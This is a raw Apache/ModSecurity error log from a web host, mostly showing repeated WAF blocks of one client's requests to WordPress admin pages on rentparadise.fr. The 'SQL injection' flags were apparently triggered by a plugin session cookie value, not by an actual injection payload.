[Mon May 11 18:29:15.974798 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID2jJnyuKVXoStDhbhCQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:16.260112 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID3DJnyuKVXoStDhbhCwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:16.260413 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID3DJnyuKVXoStDhbhCwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:17.350147 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID3DJnyuKVXoStDhbhCwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:17.448166 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID3TJnyuKVXoStDhbhDgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:17.448461 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID3TJnyuKVXoStDhbhDgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:18.195651 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID3TJnyuKVXoStDhbhDgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:18.285422 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID3jJnyuKVXoStDhbhEAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:18.285691 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID3jJnyuKVXoStDhbhEAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:18.321028 2026] [autoindex:error] [pid 1411099:tid 1411114] [client 64.71.131.243:41936] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:29:19.042371 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID3jJnyuKVXoStDhbhEAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:19.281782 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID3zJnyuKVXoStDhbhEgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:19.282065 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID3zJnyuKVXoStDhbhEgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:19.900289 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID3zJnyuKVXoStDhbhEgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:20.269019 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID4DJnyuKVXoStDhbhEwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:20.269315 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID4DJnyuKVXoStDhbhEwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:21.147775 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID4DJnyuKVXoStDhbhEwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:21.381730 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID4TJnyuKVXoStDhbhFQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:21.382016 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID4TJnyuKVXoStDhbhFQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:22.145416 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID4TJnyuKVXoStDhbhFQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:22.420117 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID4jJnyuKVXoStDhbhFwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:22.420407 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID4jJnyuKVXoStDhbhFwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:23.038596 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID4jJnyuKVXoStDhbhFwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:23.428588 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID4zJnyuKVXoStDhbhHgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:23.428886 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID4zJnyuKVXoStDhbhHgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:24.744512 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID4zJnyuKVXoStDhbhHgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:25.221513 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID5TJnyuKVXoStDhbhIgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:25.221818 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID5TJnyuKVXoStDhbhIgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:25.607080 2026] [security2:error] [pid 1424905:tid 1424909] [client 43.159.61.24:47852] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/on-vous-attend-a-la-brasserie-pour-les-10-ans-de-la-baujue/"] [unique_id "agID5YW8yzYoWG_eyCXBQAAAAUE"]
[Mon May 11 18:29:25.611993 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID5TJnyuKVXoStDhbhIgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:25.932777 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID5TJnyuKVXoStDhbhJQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:25.933058 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID5TJnyuKVXoStDhbhJQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:26.165957 2026] [security2:error] [pid 1416109:tid 1416138] [client 43.134.178.104:35478] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agID5lV4kyjgo4bQBUiANgAAAMg"]
[Mon May 11 18:29:26.751423 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID5TJnyuKVXoStDhbhJQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:27.151587 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID5zJnyuKVXoStDhbhJgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:27.151878 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID5zJnyuKVXoStDhbhJgAAAEE"], referer: https://rentparadise.fr/wp-login.php
